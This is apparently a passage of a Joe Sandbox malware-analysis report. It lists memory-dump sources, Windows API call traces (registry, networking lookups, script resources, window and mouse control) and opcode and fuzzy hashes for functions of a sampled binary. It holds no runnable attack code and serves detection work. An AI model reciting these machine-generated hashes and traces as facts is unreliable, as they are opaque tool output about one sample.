                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                      • API String ID: 0-537541572
                                                                                                                                                                                                                                      • Opcode ID: 2661cf6a8a5c0a87d2c1bb7dacd3b675e7f10eece5083223cb4715c1fa098392
                                                                                                                                                                                                                                      • Instruction ID: 0010cd6b8979b4da309f7e303869b1fe81e78cd7db4780661537baabfce0a25a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2661cf6a8a5c0a87d2c1bb7dacd3b675e7f10eece5083223cb4715c1fa098392
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5711A5F5A05211EBCB32AB35DC85A6B7758AB01F65F152212F90EB7290DA71EE00E7D0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                      • String ID: 0.0.0.0
                                                                                                                                                                                                                                      • API String ID: 348263315-3771769585
                                                                                                                                                                                                                                      • Opcode ID: f4fffc4fcdb8bb2e136a918f8de71f105bfa8710619bcbd73863216adbb2c606
                                                                                                                                                                                                                                      • Instruction ID: ba5163f4ed33d6ddc1a95db5abef8a7004bf35061387fad4bf958f91858474bb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4fffc4fcdb8bb2e136a918f8de71f105bfa8710619bcbd73863216adbb2c606
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA113371908114AFDB24BB319D0AFEE7BACDF40314F10106AF108B61D1EF719A86DB54
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00EA44F9,?,?,00000000,00000000), ref: 00ED3829
                                                                                                                                                                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00EA44F9,?,?,00000000,00000000), ref: 00ED3840
                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,00EA44F9,?,?,00000000,00000000,?,?,?,?,?,?,00E65346), ref: 00ED3850
                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00EA44F9,?,?,00000000,00000000,?,?,?,?,?,?,00E65346), ref: 00ED3861
                                                                                                                                                                                                                                      • LockResource.KERNEL32(00EA44F9,?,?,00EA44F9,?,?,00000000,00000000,?,?,?,?,?,?,00E65346,?), ref: 00ED3870
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                      • String ID: SCRIPT
                                                                                                                                                                                                                                      • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                      • Opcode ID: 31ad040c9662d60ad5c9ad6449bfb6170a8e950eb4809d2c6ea2e741ccb92595
                                                                                                                                                                                                                                      • Instruction ID: cd3b5c49a58fe3459d6f62024ddf7dfdcf4ca7a2b579a7ccba2cb67a637be658
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31ad040c9662d60ad5c9ad6449bfb6170a8e950eb4809d2c6ea2e741ccb92595
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B911CB74200301BFE7248B26DC48F277BBAEBC5B51F104169B406E62A0DB71EC01DA71
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00ECE133
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 00ECE13A
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00ECE150
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 00ECE157
                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00ECE19B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00ECE178
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                      • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                      • Opcode ID: b73ae6dd8dc1ee1515d6d16f0cd7cf50a5b7aaae4b8819528d3a68e4010733a3
                                                                                                                                                                                                                                      • Instruction ID: eb2d7f616a7a4e7d68ae6151a838197b2eafd4c9d917830a423f16f83d22a4d0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b73ae6dd8dc1ee1515d6d16f0cd7cf50a5b7aaae4b8819528d3a68e4010733a3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D016DF6904308BFE710ABA49D89FFA7B6CDB48304F0145A5B706F2041EA749E898B71
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(016FA3C0,016FA3C0), ref: 00ED112D
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(016FA3A0,00000000), ref: 00ED113F
                                                                                                                                                                                                                                      • TerminateThread.KERNEL32(?,000001F6), ref: 00ED114D
                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000003E8), ref: 00ED115B
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00ED116A
                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(016FA3C0,000001F6), ref: 00ED117A
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(016FA3A0), ref: 00ED1181
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3495660284-0
                                                                                                                                                                                                                                      • Opcode ID: 1483f1d59058fc8f6a11155462abf440463043acc2da563ee79604bb582548c9
                                                                                                                                                                                                                                      • Instruction ID: f70c42c846c997e848c933fd34598ad4c137e1d44401a32838ce365016bc0c3a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1483f1d59058fc8f6a11155462abf440463043acc2da563ee79604bb582548c9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4FF0EC32047612BFD7421B55EE49BEABF3AFF84306F402161F201A58B087749469DF90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetMenu.USER32(?), ref: 00EF29E8
                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 00EF2A1A
                                                                                                                                                                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00EF2A42
                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 00EF2AB2
                                                                                                                                                                                                                                      • GetSubMenu.USER32(?,?), ref: 00EF2AC0
                                                                                                                                                                                                                                        • Part of subcall function 00EC40CD: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EC40E7
                                                                                                                                                                                                                                        • Part of subcall function 00EC40CD: GetCurrentThreadId.KERNEL32 ref: 00EC40EE
                                                                                                                                                                                                                                        • Part of subcall function 00EC40CD: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00EC2C3D), ref: 00EC40F5
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EF2B48
                                                                                                                                                                                                                                        • Part of subcall function 00ECF09D: Sleep.KERNEL32 ref: 00ECF115
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2039446747-0
                                                                                                                                                                                                                                      • Opcode ID: 3f188f966669379efe7510942c85b65c77bf034bca99e39809be2c55a54015eb
                                                                                                                                                                                                                                      • Instruction ID: 8073a1dff48233aa941f37ae50cd0acbb9fff07ed72c1410d703300a98bee276
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f188f966669379efe7510942c85b65c77bf034bca99e39809be2c55a54015eb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB717D75A04209AFCB10EF64C845ABEBBF5EF88314F10945DEA1AFB241DB74AD41CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EED1F1: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EEBF07,?,?), ref: 00EED20E
                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EEC523
                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EEC57E
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00EEC5C3
                                                                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00EEC5F2
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EEC64C
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00EEC658
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3451389628-0
                                                                                                                                                                                                                                      • Opcode ID: 2e44c2227c7a7ed9a3315ac655cc10d17b2d917d886e2669d510afeb8145b38b
                                                                                                                                                                                                                                      • Instruction ID: b982a6818f5712b961a25ae7e1011b89fe46678e6a0f46604f8b94302af8b045
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e44c2227c7a7ed9a3315ac655cc10d17b2d917d886e2669d510afeb8145b38b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6181C630108345AFC714DF15C895E2ABBE5FF84308F24995CF45A6B292DB31ED4ACB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(00000035), ref: 00EBFDE8
                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(00000001), ref: 00EBFE8F
                                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(00EC0093,00000000), ref: 00EBFEB8
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(00EC0093), ref: 00EBFEDC
                                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(00EC0093,00000000), ref: 00EBFEE0
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00EBFEEA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3859894641-0
                                                                                                                                                                                                                                      • Opcode ID: 839d28a47090cff212c20a47be9de109225f7973d5d5003c4649fc0ecaa7a3a7
                                                                                                                                                                                                                                      • Instruction ID: 922388914532347852cb115d4af6203def67f8077ba70b0b551975327da23ac2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 839d28a47090cff212c20a47be9de109225f7973d5d5003c4649fc0ecaa7a3a7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2451D335604310EADF20AF649C95BBAB3E9EF46310B20746BF905FF292DB709845CB56
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E79DA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E79DB2
                                                                                                                                                                                                                                      • BeginPaint.USER32(?,?,?), ref: 00E79447
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00E794AB
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00E794C8
                                                                                                                                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E794D9
                                                                                                                                                                                                                                      • EndPaint.USER32(?,?,?,?,?), ref: 00E79527
                                                                                                                                                                                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00EB77E6
                                                                                                                                                                                                                                        • Part of subcall function 00E7953F: BeginPath.GDI32(00000000), ref: 00E7955D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3050599898-0
                                                                                                                                                                                                                                      • Opcode ID: 718620b428255042ba70ccf0e87ff6f427b283c231e8184ff79e5ef67e50a793
                                                                                                                                                                                                                                      • Instruction ID: 433446c0289cfcd17655bb212736b18939cc196b1173037950d737f0068cb83d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 718620b428255042ba70ccf0e87ff6f427b283c231e8184ff79e5ef67e50a793
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F41D2301053149FD711DF28DC84FBA7BE9EF85334F104269F9A8A72A2DB309845EB62
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00EBF7B0,00000000,?,?,00000000,?,00EA2970,00000004,00000000,00000000), ref: 00EF8A6D
                                                                                                                                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 00EF8A93
                                                                                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00EF8AF2
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000004), ref: 00EF8B06
                                                                                                                                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 00EF8B2C
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00EF8B50
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 642888154-0
                                                                                                                                                                                                                                      • Opcode ID: a1945d94fd10fb0dd45a5a41005919da206870e4742ce82a0bedd9b8deb2e269
                                                                                                                                                                                                                                      • Instruction ID: 78b0749361ec38120f94f0ed7209890a9d5d7d7cd418d622ad9e965cbcb16f90
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1945d94fd10fb0dd45a5a41005919da206870e4742ce82a0bedd9b8deb2e269
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B41F77420624CEFDB65CF14C999BB47BE1FB45319F1860AAE7086F2A2CB31A845DB40
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 00EE2B41
                                                                                                                                                                                                                                        • Part of subcall function 00EDED3E: GetWindowRect.USER32(?,?), ref: 00EDED56
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00EE2B6B
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00EE2B72
                                                                                                                                                                                                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00EE2BAE
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00EE2BDA
                                                                                                                                                                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EE2C38
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2387181109-0
                                                                                                                                                                                                                                      • Opcode ID: e251a9b9a412703f0ec8312988c71f61e697761c650303243d3db56bda1c591b
                                                                                                                                                                                                                                      • Instruction ID: 5b80d3b111b869c242ed40eb7a15f8dccbddbefe131d945b74af567342275c76
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e251a9b9a412703f0ec8312988c71f61e697761c650303243d3db56bda1c591b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F319E72509359AFC720DF158C49FAABBAAFBC4314F00191DF585A7181DA31EA09CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EF8506
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00EF852B
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00EF8543
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 00EF856C
                                                                                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00EDBFFD,00000000), ref: 00EF858C
                                                                                                                                                                                                                                        • Part of subcall function 00E79DA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E79DB2
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 00EF8577
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
